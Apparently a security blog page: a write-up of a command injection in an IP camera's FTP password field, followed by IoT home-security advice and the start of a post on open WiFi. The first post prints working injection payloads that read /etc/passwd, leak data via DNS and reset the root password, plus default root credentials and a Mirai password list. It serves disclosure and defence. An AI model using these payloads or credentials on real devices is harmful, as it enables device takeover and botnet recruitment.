The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.</div>
<div style="text-align: justify;">
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:</div>
<pre>$(ping%20-c%202%20%60pwd%60)</pre>
or cleaning up after URL decode:
<br />
<pre>$(ping -c 2 `pwd`)</pre>
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.<br />
<br />
The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.<br />
<pre>$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`) ;leak it via DNS
</pre>
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...<br />
<br />
I also tried <a href="https://github.com/stasinopoulos/commix" target="_blank">commix</a>, as it looked promising on <a href="https://www.youtube.com/watch?t=297&v=aVTGqiyVz5o" target="_blank">Youtube</a>. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYVywsu3nlALjTw-4fSsSDDSIPhja12y7UCHW869O91GJ8qHE6fy86HDnJYv6f7Ut5oGlYcEDdfSpHuBVgOo5dWW9JBFGGk5lCsrXA_VdNkJ4US0eI6N2vzGcpN5PxlTuBvtpcnYdtFxQ_/s1600/camera2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="435" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYVywsu3nlALjTw-4fSsSDDSIPhja12y7UCHW869O91GJ8qHE6fy86HDnJYv6f7Ut5oGlYcEDdfSpHuBVgOo5dWW9JBFGGk5lCsrXA_VdNkJ4US0eI6N2vzGcpN5PxlTuBvtpcnYdtFxQ_/s640/camera2.png" width="640" /></a></div>
<br />
<br />
But after spending way too much time without progress, I finally found the password to Open Sesame.<br />
<pre>$(echo 'root:passwd'|chpasswd)</pre>
Now, logging in via telnet<br />
<pre>(none) login: root
Password:
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
</pre>
Woot woot :) I quickly noticed the root of the command injection problem:<br />
<br />
<pre># cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye
</pre>
<br />
<div style="text-align: justify;">
Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. </div>
<br />
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh<br />
<br />
<div style="text-align: justify;">
Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a <a href="https://www.youtube.com/watch?v=a6iW-8xPw3k" target="_blank">luggage password</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwV5VgYLsZRHb1hFuEGYxTESomeR_JWhFLMp9YXgayz4FnGuSLbe1v7tKuNEdzM88htG72yQelUXgbmh9SdSWC6VtF3R9jzplZkqMkqj-HaTAJsd312Ls8XTcpL5a9rpg5UG3RN-rYmZhx/s1600/camera.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwV5VgYLsZRHb1hFuEGYxTESomeR_JWhFLMp9YXgayz4FnGuSLbe1v7tKuNEdzM88htG72yQelUXgbmh9SdSWC6VtF3R9jzplZkqMkqj-HaTAJsd312Ls8XTcpL5a9rpg5UG3RN-rYmZhx/s400/camera.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is time to recap what we have. <b><u>There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.</u></b></div>
<div style="text-align: justify;">
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Last but not least everything is running as root, which is not surprising. </div>
<h2 style="text-align: justify;">
My hardening list</h2>
<div style="text-align: justify;">
I added these lines to the end of /system/init/ipcam.sh:</div>
<pre>sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
</pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh</div>
<pre>iptables -A OUTPUT -p udp ! --dport 53 -j DROP</pre>
<pre></pre>
<div style="text-align: justify;">
</div>
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.<br />
<h2>
My TODO list</h2>
<div style="text-align: justify;">
<ul>
<li>Investigate the script /system/system/bin/gmail_thread</li>
<li>Investigate the cloud protocol * - see update 2016 10 27</li>
<li>Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn</li>
</ul>
<div>
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. </div>
<div>
<br /></div>
<div>
And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIVQQkC-J331Bm_kLEPapmLkM6LjS-MgSjfdwvz2RvDmnGB__4l3P9JQBvjltyOItqtmVWJVnbHfNo937L4CLf-dFZ_bowuYLbV18WWPDiTTcRLOhFcHgFihvmLrfSRlLyeD3lFFkhCyi/s1600/2015-09-25+18.58.41.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIVQQkC-J331Bm_kLEPapmLkM6LjS-MgSjfdwvz2RvDmnGB__4l3P9JQBvjltyOItqtmVWJVnbHfNo937L4CLf-dFZ_bowuYLbV18WWPDiTTcRLOhFcHgFihvmLrfSRlLyeD3lFFkhCyi/s320/2015-09-25+18.58.41.jpg" width="223" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If you are interested in generic ways to protect your home against IoT, read <a href="http://jumpespjump.blogspot.nl/2015/08/how-to-secure-your-home-against.html" target="_blank">my previous blog post</a> on this. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCDjthEedav-ewinSwno84GjlyChqnNaFRK9CCDZMDMwgSqr95qND-1LJp_pBX8J4ArbNCrsGc4z4DMgnI_6hVxuDgVfOmkDXyUV-_KtcUGVVtYR_PxANQRHIpVIB3JhGuDON7QdsgZCaW/s640/blogger-image--2098725782.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCDjthEedav-ewinSwno84GjlyChqnNaFRK9CCDZMDMwgSqr95qND-1LJp_pBX8J4ArbNCrsGc4z4DMgnI_6hVxuDgVfOmkDXyUV-_KtcUGVVtYR_PxANQRHIpVIB3JhGuDON7QdsgZCaW/s640/blogger-image--2098725782.jpg" /></a></div>
<br />
<div>
Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.<br />
<br />
root xc3511<br />
root vizxv<br />
root admin<br />
admin admin<br />
root 888888<br />
root xmhdipc<br />
root default<br />
root juantech<br />
root 123456<br />
root 54321<br />
support support<br />
root (none)<br />
admin password<br />
root root<br />
root 12345<br />
user user<br />
admin (none)<br />
root pass<br />
admin admin1234<br />
root 1111<br />
admin smcadmin<br />
admin 1111<br />
root 666666<br />
root password<br />
root 1234<br />
root klv123<br />
Administrator admin<br />
service service<br />
supervisor supervisor<br />
guest guest<br />
guest 12345<br />
guest 12345<br />
admin1 password<br />
administrator 1234<br />
666666 666666<br />
888888 888888<br />
ubnt ubnt<br />
root klv1234<br />
root Zte521<br />
root hi3518<br />
root jvbzd<br />
root anko<br />
root zlxx.<br />
root 7ujMko0vizxv<br />
root 7ujMko0admin<br />
root system<br />
root ikwb<br />
root dreambox<br />
root user<br />
root realtek<br />
root 00000000<br />
admin 1111111<br />
admin 1234<br />
admin 12345<br />
admin 54321<br />
admin 123456<br />
admin 7ujMko0admin<br />
admin 1234<br />
admin pass<br />
admin meinsm<br />
tech tech<br />
mother fucker</div>
<div>
<br />
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.<br />
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8<br />
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX2cQGqiKLMMHthT2Mkg1DsEGJ72yYPfZYUz_OkwPpCdhK5IfZo9SXl2276FbvBuSH7sUIWxqUoIrl_sgUGmhJwPakFUGGTqvCJgP7n-guwr1lK5RSDSJKxQU3rEqt-bz8ooxZVBWyU_-j/s1600/ipcamera_protocol2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX2cQGqiKLMMHthT2Mkg1DsEGJ72yYPfZYUz_OkwPpCdhK5IfZo9SXl2276FbvBuSH7sUIWxqUoIrl_sgUGmhJwPakFUGGTqvCJgP7n-guwr1lK5RSDSJKxQU3rEqt-bz8ooxZVBWyU_-j/s640/ipcamera_protocol2.png" width="640" /></a></div>
<br />
Update 2017-03-08: "<span style="text-align: start; white-space: pre-wrap;">Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),</span><br />
<span style="text-align: start; white-space: pre-wrap;">which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. </span>"<a href="https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt">https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt</a><br />
<br />
Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."<br />
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.<br />
<a href="http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/">http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/</a><br />
<span style="background-color: white; font-size: 14px; text-align: left;"><span style="color: #666666; font-family: "arial" , sans-serif;"><br /></span></span>
<span style="background-color: white; color: #666666; font-family: "arial" , sans-serif; font-size: 14px; text-align: left;"><br /></span></div>
</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com42tag:blogger.com,1999:blog-7429675726481888518.post-22105198701547020772015-08-20T13:37:00.000+02:002019-10-08T16:06:38.226+02:00How to secure your home against "Internet of Things" and FUD<div style="text-align: justify;">
TL;DR, most of the security news about IoT is full of FUD. Always put the risks in context - who can exploit this and what can the attacker do with it. Most story only covers the latter.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
There is rarely a day without news that another "Internet of Things" got hacked. "Smart" safes, "smart" rifles, "smart" cars, "smart" fridges, "smart" TVs, "smart" alarm systems, "smart" meters, "smart" bulbs, NAS devices, routers. These devices are getting hacked every day. Because most of these devices were never designed with security as a goal, and some of them have been never tested by security professionals, it is no surprise that these things are full of vulnerabilities.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRiGeG8XxsxePPyoNuLxtyKaF_vUUSdwK0ONcmgZoQOqezlN1eqwntlXITng2Nt5VjvMoqiG09bqbpkWy0ZTTHVWTaOERf0f4xWcw8q1eFLe8kKXvkKTj-DDoPSdaV4NY-u2P_P6HHA42w/s1600/thereisnotiot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRiGeG8XxsxePPyoNuLxtyKaF_vUUSdwK0ONcmgZoQOqezlN1eqwntlXITng2Nt5VjvMoqiG09bqbpkWy0ZTTHVWTaOERf0f4xWcw8q1eFLe8kKXvkKTj-DDoPSdaV4NY-u2P_P6HHA42w/s400/thereisnotiot.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Independent security researchers find these vulnerabilities, write a cool blog post or give a presentation about the vulnerability and the exploit, and the media forgets the constraints just for the sake of more clicks. "We are all doomed" we can read in the news, but sometimes the risks are buried deeply in technical jargon. Please note I blame the news sites here, not the researchers.</div>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwdPqBMHzzgGKfoSQsLYYAJNDTwX2pGQUQ-mFJMd1HwCLHwo_uH1oItpGLhKp8LdhhMlr73ej8k3JtOfUR5fNCwHwL3qph8iT3RiRpc_GjFbaPdJ5xi_-2XwPlXkYNLJrryGDwxaBKXFn/s1600/iotjunk.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwdPqBMHzzgGKfoSQsLYYAJNDTwX2pGQUQ-mFJMd1HwCLHwo_uH1oItpGLhKp8LdhhMlr73ej8k3JtOfUR5fNCwHwL3qph8iT3RiRpc_GjFbaPdJ5xi_-2XwPlXkYNLJrryGDwxaBKXFn/s640/iotjunk.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://www.slideshare.net/danielmiessler/iot-attack-surfaces-defcon-2015</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
There are huge differences between the following risks:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Attackers can directly communicate with the router (or camera) from the Internet without authentication and exploit the vulnerability. This is the worst-case scenario. For example, an <a href="http://forum.synology.com/enu/viewtopic.php?f=3&t=88716" target="_blank">automated ransomware attack</a> against your NAS is pretty bad.</li>
<li style="text-align: justify;">Attackers have to position themselves in the same WAN network (e.g. Sprint mobile network in the case of Jeep hacking) to exploit the vulnerability. This is still pretty bad.</li>
<li style="text-align: justify;">The vulnerable code can not be triggered directly from the Internet, but tricks like CSRF can be used to exploit it (details later in this post). </li>
<li style="text-align: justify;">The vulnerable code can not be triggered directly from the Internet, and it uses a protocol/port which prevents <a href="https://www.kb.cert.org/vuls/id/476267" target="_blank">Cross Protocol Scripting</a>. Attackers have to access the local network before exploiting this vulnerability.</li>
</ul>
<div style="text-align: justify;">
As it is the case with the worst scenario, one can find a lot of devices connected to the internet. You can always find funny stuff at <a href="http://explorer.shodanhq.com/#/explore">http://explorer.shodanhq.com/#/explore</a> , or use the <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Using-Nmap-to-Screenshot-Web-Services/" target="_blank">nmap screenshot script</a> to find your own stuff :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdmXH1f-UBbBSy0AKG1lYp3nnfB9MND6iN5o0ehyFOOz_eN_94yZG3UVFVYjImrzBmzYiQHz2JPLLeiMx84jMgojTT-lVYcSE_A9DzFdTqQeI-RSuVTCfp8DxJ7jfSQx9Z3FCBc93j3oV6/s1600/shodan.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdmXH1f-UBbBSy0AKG1lYp3nnfB9MND6iN5o0ehyFOOz_eN_94yZG3UVFVYjImrzBmzYiQHz2JPLLeiMx84jMgojTT-lVYcSE_A9DzFdTqQeI-RSuVTCfp8DxJ7jfSQx9Z3FCBc93j3oV6/s400/shodan.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Network exposure</h2>
<div style="text-align: justify;">
Most devices are behind an IPv4 NAT device (e.g. home router), thus can not be reached from the Internet side by default. Except when the device configures the firewall via UPNP. Or the device has a persistence cloud connection, and the cloud can send commands to the device. Or the device uses IPv6 tunneling (e.g. Teredo), thus it is reachable from the Internet. But not every vulnerability on your home network is accessible directly from the Internet. As more and more devices and networks will support IPv6, this scenario might change, but I hope most home routers will come with a default deny configuration in their IPv6 firewall module. On the other hand, scanning for IPv6 devices blindly is not feasible due to the large number of IPv6 addresses, but <a href="https://youtu.be/t9d7p3zxoiM?t=2437" target="_blank">some tricks might work</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If attackers can not access the device directly, there is a way to hack it through the user's browser. Just convince the victim user to visit a website, and via <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">CSRF (Cross Site Request Forgery)</a> and brute-forcing the device IP, it is possible to hack some devices (mostly through HTTP - if the exploit can fit into simple GET or POST commands.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHm5AXruKmb3KE7dKPjm81kmr4l9ibentnNmQNCRVtH2eLJ4dF4yqDIvS57ZFfuyd00rY7XrhIaNBeS3cEZv9YA4ziZaFQd2Hy0epDP-Dy1dxJS-tpboJpp0IeuIQ8p2eAzb3gbpA8p9sM/s1600/csrf.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHm5AXruKmb3KE7dKPjm81kmr4l9ibentnNmQNCRVtH2eLJ4dF4yqDIvS57ZFfuyd00rY7XrhIaNBeS3cEZv9YA4ziZaFQd2Hy0epDP-Dy1dxJS-tpboJpp0IeuIQ8p2eAzb3gbpA8p9sM/s640/csrf.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If attackers can not attack the device vulnerability through the Internet directly, or via CSRF, but have connected to the same network - the network exposure shrinks significantly. And when attackers are on the same network as you, I bet you have bigger problems than the security of the IoT devices ...</div>
<h2 style="text-align: justify;">
Recommendations for home users</h2>
<div>
<div style="text-align: justify;">
Don't buy **** you don't need<br />
<br />
Disconnect from the power cord the IoT devices you don't need to operate 7*24. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Disable cloud connectivity if it is not necessary. For example, I have a NAS device that can be reached through the "cloud", but I have disabled it by not configuring any default gateway for the device. I prefer connecting to my network via VPN and reach all my stuff through that.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Prevent CSRF attacks. I use two tricks. Don't use the 192.168.0.x - 192.168.10.x network at-home - use an uncommon IP range instead (e.g. 192.168.156.x is better). The second trick is I configured my Adblock plugin in my primary browser to block access to my internal network. And I use another browser whenever I want to access my internal devices. Update: On Firefox you can use NoScript ABE to block access to internal resources.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg32YNsKBMroYZ2RknxarbOmVYOaFLgj3BUpPyeOqkI5XwptDc5M2Sx43Qwss7McUzJBGPh56SpCPHTMOpLkCA0v_NgYoEo_u6QSJoNR9AnbJfEOrnzYkbwDhqfNqjIhf7q7Xx3AczCxhWG/s1600/adblock.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg32YNsKBMroYZ2RknxarbOmVYOaFLgj3BUpPyeOqkI5XwptDc5M2Sx43Qwss7McUzJBGPh56SpCPHTMOpLkCA0v_NgYoEo_u6QSJoNR9AnbJfEOrnzYkbwDhqfNqjIhf7q7Xx3AczCxhWG/s640/adblock.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Check your router configuration:<br />
<br />
<ul>
<li>disable UPnP</li>
<li>check the firewall settings and disable unnecessary port forwards</li>
<li>check for IPv6 settings, and configure the firewall as default deny for incoming IPv6 TCP/UDP.</li>
</ul>
</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Change default passwords, especially for services connected to the Internet. <a href="http://jumpespjump.blogspot.com/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">Follow password best practices.</a></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Run Nmap to locate new IoT in your home network :) </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Run a WiFi scan to locate new WiFi access points. Let me share a personal experience with you. I moved to a new house and brought my own WiFi router with me. I plugged it in, and forget about WiFi. Months later it turned out I had two other WiFi devices in my house - the cable modem had its own integrated WiFi with default passwords printed on the bottom, and the Set-top-box was the same - default WiFi passwords printed on the bottom. And don't forget to scan for ZigBee, Bluetooth, IrDA, FM, ...</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Update your devices - in case you have a lot of free time in your hand.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Don't allow your guests to connect to your home network. Set up a separated AP for them. Imagine your nephew stealing your private photos or videos from your NAS or DNLA server.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
With great power, comes great responsibility. The less device you own in your house, the less time you need to maintain those.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Read the manuals of your devices. Be aware of the different interfaces. Configure it in a secure way.</div>
<div style="text-align: justify;">
<br />
Disable Teredo protocol in case you don't need IPv6.<br />
<br /></div>
<div style="text-align: justify;">
Stop being amazed by junk hacking.<br />
<br />
Update: Disable WebRTC: <a href="https://www.browserleaks.com/webrtc" target="_blank">https://www.browserleaks.com/webrtc</a> , in Chrome you can use this extension: <a href="https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia">https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia</a></div>
</div>
<div>
<div style="text-align: justify;">
<br />
Update: Prevent against DNS rebind attacks via configuring a DNS server which can block internal IP addresses. OpenDNS can block internal IP, but this is not a default option, you have to configure it.<br />
<h2>
Recommendations for vendors</h2>
<div>
For vendors, I recommend at least the followings:</div>
<div style="text-align: start;">
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Implement security during Software Development LifeCycle</li>
<li style="text-align: justify;">Continuous security testing and bug bounties</li>
<li style="text-align: justify;">Seamless auto-update</li>
<li style="text-align: justify;">Opt-in cloud connectivity</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
</div>
</div>
<div>
<h2 style="text-align: justify;">
Recommendations for journalists</h2>
</div>
<div>
<div style="text-align: justify;">
Stop FUD. Pretty please.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<h2 style="text-align: justify;">
The questions to ask before losing your head</h2>
<div>
<ul>
<li style="text-align: justify;">who can exploit the vulnerability?</li>
<li style="text-align: justify;">what prerequisites do we have about the attack to successfully exploit the vulnerability? Is the attacker already in your home network? If yes, you have probably bigger problems.</li>
<li style="text-align: justify;">what can the attacker do when the exploit is successful?</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
And last but not least, don't forget that in the case of IoT devices, sometimes users are the product, not the customer. IoT is about collecting data for marketing purposes.</div>
</div>
<div>
<div style="text-align: justify;">
<a href="http://blog.open-xchange.com/2015/02/09/iot/">http://blog.open-xchange.com/2015/02/09/iot/</a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCG8ESkDlv6mogAXJTRL-9AW8BNyFNcyDIPkqKlJTI-IFOhPD7stONWpqygo44Z4j0j22J2iiIbUc4sehrLDp2MsR2V8xOfwX6tmWyCeTPr-uiBaJkFwrWHjlWkyJXFAeq2tHkPK1THbq0/s1600/ios.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCG8ESkDlv6mogAXJTRL-9AW8BNyFNcyDIPkqKlJTI-IFOhPD7stONWpqygo44Z4j0j22J2iiIbUc4sehrLDp2MsR2V8xOfwX6tmWyCeTPr-uiBaJkFwrWHjlWkyJXFAeq2tHkPK1THbq0/s320/ios.png" width="248" /></a></div>
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-55942232985678818672015-07-23T15:59:00.000+02:002019-10-08T15:37:15.759+02:00Mythbusters: Is an open (unencrypted) WiFi more dangerous than a WPA2-PSK? Actually, it is not.<h2>
Introduction</h2>
<div>
<br /></div>
<div style="text-align: justify;">
Whenever security professionals recommend the 5 most important IT security practices to average users, one of the items is usually something like: “Avoid using open Wifi” or “Always use VPN while using open WiFi” or “Avoid sensitive websites (e.g. online banking) while using open WiFI”, etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What I think about this? It is bullshit. But let’s not jump to the conclusions. Let’s analyze all risks and factors here.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxBTj92DHv5M47xjGw-TZ7Qvr6BOWSM_I2V_KiX1zqKECvguuq6yNY6VhI-BFIMDtM0BizQMb1AzgEHlRBueq1eGdmicBKXRvF6RtNDRDng6I4qVIQjw-E3DBbe350RF4O1ThbQ7uI0pCP/s1600/chive-thursday-29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxBTj92DHv5M47xjGw-TZ7Qvr6BOWSM_I2V_KiX1zqKECvguuq6yNY6VhI-BFIMDtM0BizQMb1AzgEHlRBueq1eGdmicBKXRvF6RtNDRDng6I4qVIQjw-E3DBbe350RF4O1ThbQ7uI0pCP/s320/chive-thursday-29.jpg" width="270" /></a></div>
<br />
<br />
<div style="text-align: justify;">
During the following analysis, I made two assumptions. The first one is that we are comparing public WiFi hotspots with no encryption at all (referred to as Open), and we compare this to public WiFi hotspots with WPA2-PSK (and just hope WEP died years before). The other assumption is there are people who are security-aware, and those who just don’t care. They just want to browse the web, access Facebook, write e-mails, etc.</div>
<br />
<h3>
The risks</h3>
<div>
<br /></div>
<div style="text-align: justify;">
